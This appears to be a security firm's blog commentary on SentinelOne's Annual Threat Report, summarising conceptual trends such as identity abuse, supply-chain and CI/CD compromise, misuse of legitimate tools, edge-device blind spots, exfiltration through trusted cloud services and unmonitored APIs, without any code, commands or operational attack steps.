At Darkgate, we took a closer look at SentinelOne’s latest Annual Threat Report—not in the sense of dissecting every technical detail, but with a focus on understanding the broader patterns and structural shifts it highlights. What stands out quite quickly is that this report is less about isolated threats or malware statistics and more about how modern cyber intrusions actually unfold as a system.
One of the most noticeable shifts is the change in perspective. Instead of focusing purely on how attackers break into systems, the report emphasizes what happens after access is already established. This is where the concept of the “Identity Paradox” becomes central. The idea is straightforward but highly relevant: attackers increasingly operate using legitimate identities, making them appear indistinguishable from real users.
This becomes especially tangible in scenarios where stolen—or even formally validated—identities are used to gain access to corporate environments. In some cases, attackers are able to pass background checks and effectively act as insiders. Once inside, the distinction between legitimate behavior and malicious activity becomes extremely difficult to draw. A login from a sanctioned location or via a VPN might raise a flag, but at the same time, the identity itself is recognized as valid. This creates a conflict between security signals and business validation, making detection significantly more complex.What we found particularly interesting is that this dynamic extends beyond traditional user accounts and into the software supply chain. When a trusted developer account is compromised, for example, malicious code can be introduced into build pipelines without triggering immediate suspicion. Downstream systems continue to trust the output because the source appears legitimate. In this sense, attacks are no longer injected into systems—they are effectively built into them.
Another recurring theme throughout the report is the growing reliance on legitimate tools for malicious purposes. Instead of deploying custom malware, attackers increasingly leverage software that is already present within the environment. Remote management tools, administrative utilities, and even standard operating system components like PowerShell are used to execute attacks. Because these tools are part of normal operations, their use does not immediately appear suspicious, which makes detection far more difficult.
This becomes even more evident in scenarios involving social engineering. In some cases, attackers impersonate internal IT staff and convince users to install or run legitimate remote access tools. Combined with techniques such as voice phishing or coordinated email campaigns, this creates access that is technically clean and difficult to distinguish from normal IT support activity. Once established, this type of access can persist without triggering traditional malware alerts.The report also highlights developments on the infrastructure side, particularly around edge systems. Components such as VPN concentrators, firewalls, and load balancers are often considered strong security anchors, yet they can also become blind spots if not properly managed. The notion of “Edge Decay” suggests a gradual loss of visibility and control over these systems. This is especially critical when combined with automated attack capabilities, where vulnerabilities can be discovered and exploited at scale within very short timeframes.
A similar shift can be observed in development and production environments. Under the concept of “Living off the Pipeline,” the report outlines how attackers are targeting CI/CD processes and build systems. By embedding malicious logic directly into development workflows, they bypass traditional runtime defenses entirely. The result is that compromised software is distributed as part of normal deployment processes, making detection significantly more challenging.
When it comes to data exfiltration, the pattern continues. Instead of using clearly malicious channels, attackers increasingly rely on legitimate cloud infrastructure to move data. Traffic routed through trusted providers or standard protocols such as HTTPS blends into normal operations. In some cases, the reputation of well-known platforms is deliberately used to mask malicious activity, allowing large volumes of data to leave the environment without immediate detection.Another area that deserves attention is the growing role of APIs and interconnected systems. Modern IT environments rely heavily on integrations between services, often through APIs that are not always fully documented or monitored. The report refers to this as the “API Shadow”—a layer of communication that exists beneath the surface of visible infrastructure. These hidden pathways can enable lateral movement and data access without triggering traditional security controls.
What emerges from all of this is a picture of attacks that are far less visible than in the past, but significantly more integrated into existing systems. Instead of breaking through defenses, attackers increasingly operate within them. They leverage trust—whether in identities, tools, processes, or infrastructure—as a primary attack vector.Our overall impression, even without going into every technical detail, is that the biggest challenge today lies not in preventing access, but in understanding what actually happens within a system once access has been granted. If malicious activity looks like normal behavior, traditional security approaches will inevitably struggle.
This aligns with what we continue to observe across real-world environments. The complexity of modern IT ecosystems creates not only opportunities, but also uncertainty—especially in areas where trust is assumed rather than verified. And it is precisely this trust that appears to be increasingly targeted.The SentinelOne report does not provide simple answers, but it clearly indicates the direction in which the conversation is moving. Away from isolated security measures, and toward a more holistic understanding of systems, processes, and how they interact under real-world conditions.
